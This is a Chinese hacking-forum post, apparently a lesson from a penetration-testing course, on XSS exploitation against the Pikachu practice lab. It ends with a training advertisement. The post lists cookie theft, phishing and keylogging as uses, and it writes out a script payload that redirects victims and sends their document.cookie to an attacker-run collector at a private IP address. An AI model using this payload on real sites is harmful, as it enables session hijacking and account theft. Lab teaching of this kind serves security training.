设为首页收藏本站
开启辅助访问 切换到窄版

登录  | 立即注册

游客您好!登录后享受更多精彩

QQ登录

只需一步,快速开始

女黑客论坛|网络安全培训|渗透测试培训|web安全培训教程»女黑客安全网 线上网络安全课 17-XSS (五)XSS注入漏洞利用
返回列表
+ 发新帖

(五)XSS注入漏洞利用

[复制链接]
发表于 2025-11-12 19:17:24 | 显示全部楼层 |阅读模式
一,XSS漏洞利用
XSS漏洞利用:cookie的窃取和利用(会话劫持)

XSS漏洞利用:钓鱼攻击

XSS漏洞利用:键盘记录
反射型(GET)XSS利用:cookie获取

截图202511121112351283.png



攻击者后台


作用:存放收集到的cookie信息

操作存储cookie的文件:cookie.php
( 注意: 修改重定向网页地址)


截图202511121114036680.png



显示cookie信息的文件
pkxss_cookie_result.php

截图202511121114248570.png

1、构造js语句  
<script>document.location='http://192.168.2.242:8000/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>

2、URL编码后的超链接
http://192.168.3.46/pikachu/vul/ ... ocument.location%3D




截图202511121115358517.png
截图202511121116173717.png
截图202511121116426094.png
必火网络安全培训,北京实地培训,月月有开班,零基础入门,四个月打造渗透高手。
详情请加微信:nvhack/153-2000-4362,手机微信同号。
回复

使用道具 举报

返回列表
+ 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|女黑客安全网 |网站地图 | 津ICP备17008032号-3

GMT+8, 2026-2-2 05:21 , Processed in 0.089684 second(s), 27 queries .

Powered by Discuz! X3.5

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表